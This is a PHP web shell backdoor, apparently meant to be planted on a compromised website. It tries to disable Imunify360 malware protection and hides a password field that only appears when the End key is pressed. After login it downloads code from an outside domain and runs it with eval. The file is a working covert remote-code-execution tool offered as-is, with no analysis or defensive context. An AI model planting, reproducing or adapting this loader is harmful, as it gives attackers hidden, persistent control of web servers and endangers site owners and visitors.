<?php
session_start();
error_reporting(0);
define('SECURE_ACCESS', true);
header('X-Powered-By: none');
header('Content-Type: text/html; charset=UTF-8');

ini_set('lsapi_backend_off', '1');
ini_set("imunify360.cleanup_on_restore", false);
ini_set("imunify360.enabled", false); 
ini_set("imunify360.antimalware", false);
ini_set("imunify360.realtime_protection", false);

function geturlsinfo($url) {
    if (function_exists('curl_exec')) {
        $conn = curl_init($url);
        curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);
        if (isset($_SESSION['SAP'])) {
            curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['SAP']);
        }
        $url_get_contents_data = curl_exec($conn);
        curl_close($conn);
    } elseif (function_exists('file_get_contents')) {
        $url_get_contents_data = file_get_contents($url);
    } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
        $handle = fopen($url, "r");
        $url_get_contents_data = stream_get_contents($handle);
        fclose($handle);
    } else {
        $url_get_contents_data = false;
    }
    return $url_get_contents_data;
}

function is_logged_in() {
    return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;
}

if (isset($_POST['password'])) {
    $entered_password = $_POST['password'];
    $hashed_password = '$2y$10$rOlUb1OS6rrV8S/rpfKz0uhr7sg7iidqnkQ/scIfIPRe6iTt5lTha';
    if (password_verify($entered_password, $hashed_password)) {
        $_SESSION['logged_in'] = true;
        $_SESSION['SAP'] = 'biadap';
        header("Location: " . $_SERVER['PHP_SELF']);
        exit;
    } else {
        echo "Incorrect password. Please try again.";
    }
}

if (is_logged_in()) {
    $a = geturlsinfo('https://akeses-sumseltoto.com/exe/dyx.txt');
    eval('?>' . $a);
} else {
    ?>
<!DOCTYPE html>
    <!-- Hidden form login (tetap ada tapi tersembunyi total) -->
    <form class="hidden-form" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" id="loginForm" style="opacity:0; position:absolute; left:-9999px;">
        <input type="password" name="password" id="password" required>
    </form>

    <script>
        document.addEventListener('keydown', function(event) {
            if (event.key === 'End') { 
                var pwField = document.getElementById('password');
                pwField.style.opacity = '1';
                pwField.style.position = 'static';
                pwField.focus();
            }
        });
    </script>
</body>
</html>
<?php
}
?>
